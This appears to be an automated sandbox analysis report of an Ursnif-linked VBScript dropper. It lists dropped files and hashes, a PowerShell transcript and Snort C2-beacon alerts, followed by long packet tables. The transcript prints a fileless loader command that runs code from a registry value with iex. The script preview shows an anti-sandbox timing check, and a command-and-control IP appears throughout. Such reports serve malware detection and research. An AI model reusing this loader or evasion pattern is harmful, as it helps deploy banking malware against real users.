                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fDGzxs7+AEszI923fDVyA:p37Lvkmb6KzaWZE2UA
                                                      MD5:3CDF3CDE074518CB1990F196594FF665
                                                      SHA1:44A79FF81BE9B5BA8B4DE4700CF53EEFD5D7E4B8
                                                      SHA-256:FCF3E1EDAE736B975342AFC964055E632CE1261AEC6BA135A92FDC803D8AC482
                                                      SHA-512:EDEBB4EFA9D8A159B0E73167E1249B3B388F9182B7372E11C554056D7395D2FEE776D38CBCFD7656DE16C7ABCD221DF392B21FA1EC85E68595FCC4D6DA800030
                                                      Malicious:false
                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs"
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3584
                                                      Entropy (8bit):2.6415056869367106
                                                      Encrypted:false
                                                      SSDEEP:24:etGSTMOWEey8MTz7X8daP0eWQpiDdWSWtJ0DtkZfdhBy7XI+ycuZhNLakSdPNnq:6x7KMTcd6q6MWPVJdhu1ulLa3Hq
                                                      MD5:FFB187695996965CE5A821FE3117AC10
                                                      SHA1:7C2AF5553CAF28D3B3501A840B579374224F3BDA
                                                      SHA-256:0EA74DC70CE2DFB19E079F878BF3BCBCB9EBD649E4ECE02154BB23F3E7915368
                                                      SHA-512:7AC93A727DA3D782F6CC049258E443ABE0E9661020C439D72643B8B13963970F90A573B953CFC5FCDFD8317E827263521E7207F6AC512EBE159BFF4714D1BF59
                                                      Malicious:false
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q.;a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.wyozc5bn.dll.tjuivx.W32.ms
                                                      C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.out
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):412
                                                      Entropy (8bit):4.871364761010112
                                                      Encrypted:false
                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                      Malicious:false
                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                      C:\Users\user\Documents\20210910\PowerShell_transcript.932923.ZOkCXrTg.20210910095711.txt
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1191
                                                      Entropy (8bit):5.3076397700168
                                                      Encrypted:false
                                                      SSDEEP:24:BxSA+LDvBBox2DOXUWOLCHGIYBtBCWayHjeTKKjX4CIym1ZJXWZOLCHGIYBtBdG9:BZSv/ooORFeVayqDYB1ZGFeaZZB
                                                      MD5:6934D641AE5F1514B6B7CFEA3791904C
                                                      SHA1:485332B13F51F8C54753232BB4A49B42296FDF2A
                                                      SHA-256:4142579D58D4B4BC9059D401A41E37F67F5FBBB73A616595C041266CB12741A6
                                                      SHA-512:176F77243F96AB018EBF54C314BB1825B616976AF63400349A2E8DC453A8E1985DF3B14211D56AAF95215ABE3F1258A740CE1CCD5DA4BB65837405AC388269F3
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210910095711..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 932923 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210910095711..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with very long lines, with CRLF line terminators
                                                      Entropy (8bit):4.853150436267665
                                                      TrID:
                                                        File name:345678.vbs
                                                        File size:1397341
                                                        MD5:9e6b216f5112b583f035ac621c78ea4e
                                                        SHA1:8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
                                                        SHA256:cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379
                                                        SHA512:5fe0568078cadf8a7847f10724e52b050ae14bcba315455476273a712a684d6f87dfb2e58885080fbc046383433afdc4d62c6c7bba858bbf5ed9a058fd088ca5
                                                        SSDEEP:12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99b9:ipvp9BT1U9cyjUAvmEZb9
                                                        File Content Preview:IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

                                                        File Icon

                                                        Icon Hash:e8d69ece869a9ec4

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        09/10/21-09:57:01.419951TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978780192.168.2.5185.251.90.253
                                                        09/10/21-09:57:01.419951TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978780192.168.2.5185.251.90.253
                                                        09/10/21-09:57:02.700383TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978880192.168.2.5185.251.90.253
                                                        09/10/21-09:57:02.700383TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978880192.168.2.5185.251.90.253
                                                        09/10/21-09:57:03.803296TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978980192.168.2.5185.251.90.253
                                                        09/10/21-09:57:03.803296TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978980192.168.2.5185.251.90.253

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 10, 2021 09:57:01.368922949 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.419253111 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.419452906 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.419950962 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.512490988 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881223917 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881283998 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881320000 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881357908 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881395102 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881441116 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881483078 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881520033 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881524086 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.881557941 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881597042 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.881704092 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.881757975 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931186914 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931248903 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931287050 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931323051 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931360960 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931397915 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931427956 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931444883 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931488037 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931524992 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931561947 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931581974 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931598902 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931634903 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931646109 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931673050 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931709051 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931710958 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931756020 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931791067 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931799889 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931837082 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931874037 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931911945 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.931915998 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.931960106 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.932001114 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.932053089 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.983778000 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.983844042 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.983882904 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.983922005 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.983958960 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984005928 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984050035 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984087944 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984095097 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984127045 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984138012 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984144926 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984165907 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984203100 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984226942 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984241009 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984277964 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984297991 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984348059 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984396935 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984400988 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984438896 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984474897 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984497070 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984513998 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984550953 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984569073 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984586954 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984623909 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984641075 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984661102 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984709024 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984721899 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984750032 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984790087 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984802008 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984827995 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984865904 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984880924 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984900951 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984940052 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.984956980 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.984977007 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985024929 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985027075 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.985065937 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985102892 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985115051 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.985140085 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985177040 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985213041 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985213995 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.985249043 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985261917 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.985285997 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985332966 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985336065 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:01.985374928 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:01.985428095 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.036674023 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036731005 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036780119 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036799908 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.036817074 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036855936 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036874056 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.036891937 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036930084 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.036951065 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.036967039 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037014961 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037030935 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037060022 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037097931 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037111044 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037137032 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037173986 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037193060 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037209034 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037246943 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037261009 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037283897 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037333012 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037341118 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037374973 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037412882 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037430048 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037451029 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037488937 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037511110 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037524939 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037563086 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037580967 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037600994 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037648916 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037666082 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037691116 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037727118 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037743092 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037765026 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037803888 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037820101 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037839890 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037878990 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037894964 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.037915945 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037962914 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.037967920 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038006067 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038042068 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038068056 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038079977 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038117886 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038137913 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038152933 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038189888 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038209915 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038225889 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038273096 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038280964 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038315058 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038342953 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038372993 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038409948 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038448095 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038486958 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038522959 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.038551092 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.038618088 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088324070 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088386059 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088423967 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088462114 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088500023 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088547945 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088565111 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088593960 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088607073 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088627100 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088633060 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088671923 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088696957 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088710070 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088746071 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088766098 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088784933 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088824987 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088845015 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088872910 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088915110 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088931084 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.088951111 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.088990927 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089013100 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089026928 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089063883 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089081049 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089101076 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089138985 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089164972 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089185953 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089229107 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089267015 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089291096 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089320898 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089358091 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089382887 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089406967 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089443922 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089446068 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089482069 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.089498043 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.089541912 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.090929985 CEST4978780192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.140307903 CEST8049787185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.650388002 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.699682951 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:02.699871063 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.700382948 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:02.792574883 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.196911097 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197005033 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197093964 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197137117 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197191000 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197249889 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197288036 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197339058 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197405100 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197464943 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197499037 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197540045 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.197592020 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.197628021 CEST8049788185.251.90.253192.168.2.5
